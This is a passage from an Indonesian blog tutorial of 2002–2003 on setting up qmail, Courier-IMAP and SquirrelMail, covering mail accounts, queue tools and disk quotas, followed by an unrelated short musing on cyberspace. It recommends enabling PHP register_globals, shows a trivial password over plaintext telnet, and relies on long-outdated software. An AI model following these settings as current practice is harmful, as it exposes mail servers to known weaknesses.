1061 ? S 0:00 tcpserver -H -v -c 30 0 110 qmail-popup gibas.wedus.com

Untuk sekedar memastikan, anda bisa mencoba telnet ke localhost port 110 :

[root@wedus asfik]# telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK <5724.1035514277@gibas.wedus.com>

Download script untuk menjalankan qmail, anda bisa download di http://www.lifewithqmail.org/qmailctl-script-dt70 namun anda harus menambahkan untuk start/stop daemon pop3d nya, atau alternatif lain script yang sudah ditambah start/stop daemon pop3d di http://people.cakraweb.com/~asfik/qmailctl :

[root@wedus src]# wget http://people.cakraweb.com/~asfik/qmailctl
[root@wedus src]# mv qmailctl /var/qmail/bin/qmailctl
[root@wedus src]# chmod 755 /var/qmail/bin/qmailctl
[root@wedus src]# ln -s /var/qmail/bin/qmailctl /usr/bin

Jika anda tidak memakai Redhat based style, anda bisa langsung ke Start-Stop qmail :

[root@wedus src]# ln -s /var/qmail/bin/qmailctl /etc/rc.d/init.d/qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc0.d/K30qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc1.d/K30qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc2.d/S80qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc3.d/S80qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc4.d/S80qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc5.d/S80qmail
[root@wedus src]# ln -s /etc/rc.d/init.d/qmail/qmail /etc/rc.d/rc6.d/K30qmail

Untuk Start-Stop qmail anda bisa lakukan perintah berikut :

[root@wedus src]# qmailctl stop
Stopping qmail...
qmail-smtpd
qmail-send
qmail-pop3d
[root@wedus src]# qmailctl start
Starting qmail

Atau dengan gaya klasik koboi Redhat :

[root@wedus src]# service qmail stop
Stopping qmail...
qmail-smtpd
qmail-send
qmail-pop3d
[root@wedus src]# service qmail start
Starting qmail

Kadang kita butuh akses ke wrapper sendmail (misalnya script cgi) atau mua yang menggunakan wrapper sendmail (mutt, pine dll), jadi kita lakukan symlink ke binari qmail untuk wrapper sendmail :

[root@wedus src]# ln -s /var/qmail/bin/sendmail /usr/sbin/sendmail
[root@wedus src]# ln -s /var/qmail/bin/sendmail /usr/bin/sendmail
Penambahan user account email

Pada intinya karena hanya mengurusi satu domain, maka setiap anda menambah satu buah account email, maka yang anda lakukan adalah sama dengan menambah satu buah account pada system Linux anda. Dan ini (amat) sangat berisiko, titik terlemah berada pada password user anda. Anda bisa mengatasinya dengan menggunakan alternatif program cek password yang yang lain yang tentunya tidak akan membaca password di /etc/passwd, atau menggunakan virtualdomain, tapi hanya anda set untuk mengurusi atau menerima email ke satu domain saja. Anyway, mari kita coba menambahkan email pada domain yang telah kita buat, misalnya account email paijo@wedus.com. Karena user paijo ini kita set hanya untuk menerima email, kita tidak akan memberi akses ssh/telnet/ftp/whatever kepada paijo untuk mengurangi resiko :

[root@wedus asfik]# adduser -s /bin/false paijo
[root@wedus asfik]# passwd paijo
Changing password for user paijo.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.

Buat direktori untuk menyimpan email untuk user paijo :

[root@core asfik]# /var/qmail/bin/maildirmake ~paijo/Maildir
[root@core asfik]# chown -R paijo.paijo ~paijo/Maildir

Beritahu kepada qmail untuk mengantarkan email ke direktori Maildir dihomedirektori user paijo :

[root@wedus asfik]# echo "./Maildir/" > ~paijo/.qmail
[root@wedus asfik]# chown paijo.paijo ~paijo/.qmail

Supaya anda tidak repot-repot lagi membuat file .qmail dan direktori Maildir setiap penambahan user baru :

[root@wedus asfik]# echo "./Maildir/" > /etc/skel/.qmail
[root@wedus asfik]# maildirmake /etc/skel/Maildir

Sehingga setiap nanti anda menambah user baru (adduser), otomatis file dan direktori tersebut diatas akan terbuat, sekarang kita mencoba mengirim email ke user paijo@wedus.com , anda boleh saja mencoba mengirim dengan menggunakan MUA seperti Eudora, pine, mutt atau yang lain, kita coba memakai old-fashioned-way, telnet port 25 di localhost :

[root@wedus asfik]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 gibas.wedus.com ESMTP
mail from : Asfihani
250 ok
rcpt to: paijo@wedus.com
250 ok
data
354 go ahead
Subject: Ini mengetest saja lho :)
ini budi
.
250 ok 1036218269 qp 917
quit
221 gibas.wedus.com
Connection closed by foreign host.

Jika anda lihat pada file /var/log/qmail/current akan ada log yang menujukkan email telah diterima dengan selamat :

[root@wedus asfik]# tail -f /var/log/qmail/current
@400000003dc36fa70e90532c new msg 224669
@400000003dc36fa70e906e84 info msg 224669: bytes 202 from qp 917 uid 503 @400000003dc36fa70ebda8a4 starting delivery 1: msg 224669 to local paijo@wedus.com @400000003dc36fa70ebf526c status: local 1/10 remote 0/20
@400000003dc36fa70fa3ce9c delivery 1: success: did_1+0+0/
@400000003dc36fa70fa3e9f4 status: local 0/10 remote 0/20
@400000003dc36fa70fa614a4 end msg 224669

Jika anda mengubah hasil format log dari unix timestamps ke format yang lebih mudah dibaca oleh manusia, anda bisa piping dengan menggunakan tai64nlocal :

[root@wedus asfik]# tail -f /var/log/qmail/current | tai64nlocal
2002-11-02 13:24:29.244346500 info msg 224669: bytes 202 from qp 917 uid 503
2002-11-02 13:24:29.247310500 starting delivery 1: msg 224669 to local paijo@wedus.com
2002-11-02 13:24:29.247419500 status: local 1/10 remote 0/20
2002-11-02 13:24:29.262393500 delivery 1: success: did_1+0+0/
2002-11-02 13:24:29.262400500 status: local 0/10 remote 0/20
2002-11-02 13:24:29.262542500 end msg 224669

Untuk membuktikan email sudah sampai dengan selamat di mailbox paijo :

[root@wedus asfik]# ls ~paijo/Maildir/new/
1036218269.921.gibas.wedus.com
[root@wedus asfik]# cat ~paijo/Maildir/new/1036218269.921.gibas.wedus.com
Return-Path:
Delivered-To: paijo@wedus.com
Received: (qmail 917 invoked from network); 2 Nov 2002 06:24:08 -0000
Received: from unknown (127.0.0.1)
by localhost with SMTP; 2 Nov 2002 06:24:08 -0000
Subject: Ini mengetest saja lho :)
ini budi

Lalu kita periksa apakah email tersebut sudah masuk ke dalam mailbox asfik@kadal.edu, anda bisa menggunakan POP3 client, misalnya Eudora, sebagai accoutname atau username untuk authentikasi ke server silakan gunakan user paijo, atau anda juga bisa melalui old-fashioned-way, telnet port 110 di localhost :

[root@wedus asfik]# telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK <961.1036219059@wedus.gibas.com>
user paijo
+OK
pass 123
+OK
list
+OK
1 273
.
retr 1
+OK
Return-Path:
Delivered-To: paijo@wedus.com
Received: (qmail 917 invoked from network); 2 Nov 2002 06:24:08 -0000
Received: from unknown (127.0.0.1)
by localhost with SMTP; 2 Nov 2002 06:24:08 -0000
Subject: Ini mengetest saja lho :)
ini budi
.
quit
+OK Connection closed by foreign host.

Disitu kita lihat email sudah masuk dengan sukses. Untuk melakukan penambahan account email yang lain silakan mengulangi langkah-langkah diatas. Jika anda tidak mempunyai rencana untuk memberikan akses webmail kepada user anda, anda telah selesai menginstall qmail. Untuk melaporkan sukses dalam installasi anda :

[root@wedus asfik]#(echo 'Nama Anda tulis disini'; uname -a) | mail asfik-docs@darkstars.org
2. Instalasi Courier Imap

Courier Imap, sesuai dengan namanya adalah sebuah IMAP server, yaitu sebuah IMAP server yang mendukung format penyimpanan email dengan menggunakan format Maildir. Dalam hal ini tujuan kita menggunakan Courier Imap adalah untuk backend dari webmail squirrelmail. Donwload courier-imap, ekstrak sourcenya, dan kita kompilasi :

[root@wedus src]# wget http://unc.dl.sourceforge.net/sourceforge/courier/courier-imap-1.5.3.tar.gz
[root@wedus src]# tar -xzvf courier-imap-1.5.3.tar.gz
[root@wedus src]# cd courier-imap-1.5.3
[root@wedus courier-imap-1.5.3]# ./configure --disable-root-check --without-authdaemon --with-authpam --enable-workarounds-for-imap-client-bugs
[root@wedus courier-imap-1.5.3]# make
[root@wedus courier-imap-1.5.3]# make install

Kita tidak membutuhkan module authentikasi yang lain, selain authpam, jadi ya dihapus saja :)

[root@wedus courier-imap-1.5.3]# rm -rf /usr/lib/courier-imap/libexec/authlib/*

Salin modu authpam yang telah kita kompilasi diatas ke direktori modul authentikasi untuk imap servernya :

[root@wedus courier-imap-1.5.3]# cp authlib/authpam /usr/lib/courier-imap/libexec/authlib/

Salin file konfigurasi standar dari courier-imap :

[root@wedus courier-imap-1.5.3]# cp /usr/lib/courier-imap/etc/imapd.dist /usr/lib/courier-imap/etc/imapd
[root@wedus courier-imap-1.5.3]# cp /usr/lib/courier-imap/etc/imapd-ssl.dist /usr/lib/courier-imap/etc/imapd-ssl

Edit file /usr/lib/courier-imap/etc/imapd , karena courier imap ini hanya digunakan untuk webmail ganti pada baris ADDRESS=0 menjadi ADDRESS=127.0.0.1 . Jika webmail anda adalah webmail yang sibuk, anda bisa menaikkan variabel MAXDAEMONS dan MAXPERIP, yang terpenting adalah ganti pada AUTHMODULES="authdaemon" menjadi AUTHMODULES="authpam":

[root@wedus courier-imap-1.5.3]# vi /usr/lib/courier-imap/etc/imapd

Start daemon courier-imap :

[root@wedus courier-imap-1.5.3]# /usr/lib/courier-imap/libexec/imapd.rc start

Anda bisa memeriksa apakah servise courier-imap anda sudah berjalan semestinya, kita gunakan perintah ps :

[root@wedus courier-imap-1.5.3]# ps ax | grep imap
2049 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=12
2052 ? S 0:00 /usr/lib/courier-imap/libexec/courierlogger imapd

Agar setiap reboot daemon courier-imap dijalankan secara otomatis :

[root@wedus courier-imap-1.5.3]# echo "/usr/lib/courier-imap/libexec/imapd.rc start" >> /etc/rc.local
3. Instalasi Squirrelmail

Menurut file INSTALL dari distribusi Squirrelmail, software ini membutuhkan php4 yang minimal dikompilasi dengan opsi --enable-track-vars --enable-force-cgi-redirect --with-gettext serta membutuhkan register_global=On dan file_uploads = On di php.ini (jika php anda menggunakan default RPM Redhat file php.ini terletak didirektori /etc). Download dan ekstrak paket squirrelmail :

[root@wedus src]# wget http://unc.dl.sourceforge.net/sourceforge/squirrelmail/squirrelmail-1.2.8.tar.gz
[root@wedus src]# tar -xzvf squirrelmail-1.2.8.tar.gz

Tentukan letak direktori squirrelmail, misalnya disini saya letakkan didirektori /usr/local/httpd/htdocs/sqmail sehingga akan bisa diakses melalui http://www.wedus.com/sqmail

[root@wedus src]# mv squirrelmail-1.2.8 /usr/local/httpd/htdocs/sqmail

Tentukan user dan group yang menjalankan proses apache :

[root@wedus src]# egrep '^(User|Group)' /usr/local/httpd/conf/httpd.conf
User www
Group www

Dari perintah diatas kita peroleh user www dan group www, kemudian ganti kepemilikan direktori /usr/local/httpd/htdocs/sqmail/data menjadi user www dan group www :

[root@wedus src]# chown -R www.www /usr/local/httpd/htdocs/sqmail/data/

Salin file konfigurasi standar ke file konfigurasi squirrelmail :

[root@wedus src]# cp /usr/local/httpd/htdocs/sqmail/config/config_default.php /usr/local/httpd/htdocs/sqmail/config/config.php

Edit file tersebut dari $domain = 'mydomain.com'; menjadi$domain = 'wedus.com'; dan $imap_server_type = 'cyrus';menjadi $imap_server_type = 'courier'; :

[root@wedus src]# vi /usr/local/httpd/htdocs/sqmail/config/config.php

Atau jika anda mengalami kesulitan dalam mengkonfigurasi squirrelmail secara manual, anda bisa menggunakan script perl yang disertakan oleh squirrelmail, pada direktori config :

[root@wedus src]# cd /usr/local/httpd/htdocs/sqmail/config
[root@wedus config]# ./conf.pl

Kemudian silakan dicoba dengan browser anda, misalnya http://www.wedus.com/sqmail, kemudian masukkan user yang telah anda buat misalnya paijo kemudian anda bisa mengganti Personal Information atau Folder Preferences dari menu Options.
4. Lain-lain

Didalam penggunaannya, terkadang qmail menemui suatu masalah, misalnya queue macet atau menumpuk, atau mailbox anda dispam dan kemudian bounce ke alamat yang tidak ketahuan jluntrung dan sangkan parannya ataupun tiba-tiba struktur direktori queue anda rusak. Atau anda punya gagasan untuk membatasi total pemakain harddisk untuk suatu domain.
4.1 qmHandle

qmHandle digunakan untuk melihat direktori queue ataupun menghapus dan melihat suatu email di direktori queue. Program ini membutuhkan perl, jadi silakan diperiksa distro linux kesayangan anda, apakah sudah terinstall perl atau belum.

[root@wedus src]# wget http://www.io.com/~mick/soft/qmHandle-0.5.1.tar.gz
[root@wedus src]# tar -xzvf qmHandle-0.5.1.tar.gz

Edit file qmHandle :

[root@wedus src]# vi qmHandle

Hapus atau beri tanda "#" pada baris ini :

$qmcmd = "csh -cf '/var/qmail/rc &'";

Unmark/uncommnet (hilangkan tanda "#") pada baris ini :

$qmcmd = '/etc/init.d/qmail start';

Atau jika anda tidak menggunakan init untuk memulai qmail :

$qmcmd = '/usr/bin/qmailctl start';

Pindahkan file binari nya ke direktori /usr/sbin atau direktori dimana anda ingat file tsb dan masuk lingkungan $PATH anda :

[root@wedus src]# mv qmHandle /usr/sbin/

Jika tidak ada email yang menyangkut di direktori queue, hasil perintah qmHandle -l -c adalah :

[root@wedus src]# qmHandle -l -c
Messages in local queue: 0
Messages in remote queue: 0

Misalkan ada sebuah email yang bounce dan numpuk direktori queue :

[root@wedus src]# qmHandle -l -c
15643 (3, R)
Return-path:
From: MAILER-DAEMON@gibas.wedus.com
To: lVKXwgvIgtQ3BL6d2TeG27oGW_yy@reply.yahoo.com
Subject: failure notice
Date: 30 Oct 2002 01:26:58 -0000
Size: 14634 bytes

Dan anda ingin menghapusnya (nomor 15643 didapat dari hasil diatas):

[root@wedus src]# qmHandle -d15643
Terminating qmail (pid 491)... this might take a while if qmail is working.
Restarting qmail... Starting qmail done (hopefully).

Untuk menghapus beberapa nomor sekaligus (misalnya nomor 1,2,3) anda bisa menggunakan qmHandle -d1 -d2 -d3 untuk menghapusnya, untuk penggunaan lebih lanjut qmHandle -h
4.2 queue-fix

Jika direktori queue anda tiba-tiba membengkak dan banyak antrian di queue, mungkin mailbox anda ada yang terkena spam atau virus atau diserang (let's say dibomb lah). Anda bisa melihat salah satu message email yang terkena spam/virus/bomb tersebut dengan qmHandle. Tapi jika jumlah message banyak menghapus dengan qmHandle adalah pekerjaan yang melelahkan :), solusinya mungkin bisa dengan menghapus direktori queue yang lama dan mengganti dengan direktori queue yang baru.

[root@wedus src]# wget http://www.netmeridian.com/e-huss/queue-fix.tar.gz
[root@wedus src]# tar -xzvf queue-fix.tar.gz
[root@wedus src]# cd queue-fix-1.4/
[root@wedus queue-fix-1.4]# make

Pindahkan file binari nya ke direktori /usr/sbin atau direktori dimana anda ingat file tsb dan masuk lingkungan $PATH anda :

[root@wedus queue-fix-1.4]# cp queue-fix /usr/sbin/

Jika anda ingin membetulkan struktur direktori queue qmail saja :

[root@wedus queue-fix-1.4]# qmailctl stop
[root@wedus queue-fix-1.4]# queue-fix -i /var/qmail/queue/
[root@wedus queue-fix-1.4]# qmailctl start

Jika anda ingin mengganti (menghapus yang lama dan membuat yang baru) struktur direktori queue qmail, perintah mv ditujukan untuk membackup direktori queue jika suatu saat nanti akan dilakukan investigasi dari pihak berwajib (anda?):

[root@wedus queue-fix-1.4]# qmailctl stop
[root@wedus queue-fix-1.4]# mv /var/qmail/queue/ /var/qmail/old-queue
[root@wedus queue-fix-1.4]# mkdir /var/qmail/queue/
[root@wedus queue-fix-1.4]# queue-fix -i /var/qmail/queue/
[root@wedus queue-fix-1.4]# qmailctl start
4.3 Quota per user (account email)

Tujuannya adalah membatasi pemakaian harddisk untuk suatu user (account email). Bagaimana cara mengatur quota pada linux dengan baik dan benar, silakan kunjungi http://www.tldp.org/HOWTO/mini/Quota.html. Jika misalnya partisini /home anda sudah terpisah dan direktori /home anda akan diquota maka pada file /etc/fstab anda ubah dari :

LABEL=/home /home ext3 defaults 1 2

Menjadi :

LABEL=/home /home ext3 defaults,usrquota 1 2

Buat file kosong pada partisi /home ganti modenya menjadi 700 :

[root@wedus asfik]# touch /home/aquota.user
[root@wedus asfik]# chmod 700 /home/aquota.user

Reboot Linux anda, pastikan setiap reboot akan menjalankan quotaon, default pada Redhat sudah dimasukkan dalam file /etc/rc.d/rc.sysinit . Lakukan quotacheck sebelum melakukan penambahan quota :

[root@wedus asfik]# quotacheck -avugfm

Test apakah quota sudah terpasang dengan semestinya :

[root@wedus asfik]# quota -uv root
Disk quotas for user root (uid 0):
Filesystem blocks quota limit grace files quota limit grace
/dev/hda8 135052 0 0 3545 0 0

Jika belum terpasang maka hasil keluaran perintah diatas adalah :

[root@wedus asfik]# quota -uv root
Disk quotas for user root (uid 0): none

Sekarang kita coba untuk memberi quota pada user paijo misalnya sebesar 10 MB :

[root@wedus asfik]# setquota -u paijo 10240 10240 0 0 /home
[root@wedus asfik]# quota -uv paijo
Disk quotas for user paijo (uid 188):
Filesystem blocks quota limit grace files quota limit grace
/dev/hda7 496 10000 10000 none 212 0 0

Jika suatu saat user paijo telah melebihi quota (ditunjukkan dengan tanda * pada hasil keluaran perintah quota) yang kita berikan maka semua email yang dikirm ke email paijo@wedus.com tersebut akan dibounce ke sendernya (dikirim balik ke pengirimnya) :

[root@wedus asfik]# quota -uv paijo
Disk quotas for user paijo (uid 188):
Filesystem blocks quota limit grace files quota limit grace
/dev/hda7 11496* 10000 10000 none 212 0 0

Hasil dari perintah tail -f /var/log/qmail/current yang menunjukkan suatu email dibounce :

[root@wedus asfik]# tail -f /var/log/qmail/current
@400000003dbf7bb835dc0084 info msg 48056: bytes 890 from qp 21917 uid 908
@400000003dbf7bb837ca6ebc starting delivery 36258: msg 48056 to local paijo@wedus.com
@400000003dbf7bb837ca95cc status: local 1/10 remote 2/20
@400000003dbf7bb8382e54f4 delivery 36258: failure: Recipient's_mailbox_is_full,_message_returned_to_sender._(#5.2.2)/
@400000003dbf7bb8382e7434 status: local 0/10 remote 2/20
@400000003dbf7bb9003b0f24 bounce msg 48056 qp 21921
@400000003dbf7bb9003b2a7c end msg 48056
@400000003dbf7bb9003b324c new msg 48058
@400000003dbf7bb9003b3634 info msg 48058: bytes 1453 from <> qp 21921 uid 914 @400000003dbf7bb901b55ecc starting delivery 36259: msg 48058 to remote asfik@kadal.edu @400000003dbf7bb901b57a24 status: local 0/10 remote 3/20
@400000003dbf7bbe19c42354 delivery 36259: success: 10.126.10.13_accepted_message./Remote_host_said:_250_Ok:_queued_as_04CF6329D2/ @400000003dbf7bbe19c44a64 status: local 0/10 remote 2/20
@400000003dbf7bbe19c45234 end msg 48058

Jika tidak (belum) bekerja sebagaimana mestinya, silakan anda kunjungi site quota mini howto tersebut diatas. Happy reading :)
5. ChangeLog

30 Juli 2003

Minor updates, update patch pada glibc di Redhat 9

08 Nopember 2002

Pembetulan baris yang terlalu panjang sehingga format PDF menjadi berantakan

02 Nopember 2002

Penulisan tutorial installasi qmail, courier-imap, dan squirrelmail ini dimulai
6. Referensi

http://www.lifewithqmail.org
http://www.qmail.org
http://www.courier-mta.org/
http://www.squirrelmail.org
File INSTALL, README dan direktori docs pada setiap distribusi paket

i am

2005-02-25T05:33:00.000-08:00

Apa yang kamu tanyakan pada dirimu didunia maya?
sebagaimana kamu mencoba mengartikan keberadaan dunia maya didalam pikiranmu, pada dasarnya tak akan dapat mencapai kesempurnaan diatas yang paling tinggi.

pada dasarnya dunia maya hanya tergolong dunia semu, dalam dunia maya hanya tabiat tabu dan tak baku.

Dunia maya hanya dunia yang tersingkir dari perasaan pikiran kita semua, dnia yang keberadaanya sangatlah terpenting dari sebagian penduduknya,

dan 1 hal lagi untuk perlu diketahui ....

DUNIA MAYA / INTERNET ADALAH DUNIA NYATA
------------------------------------------------------------------------------------
yudhax Corp 2005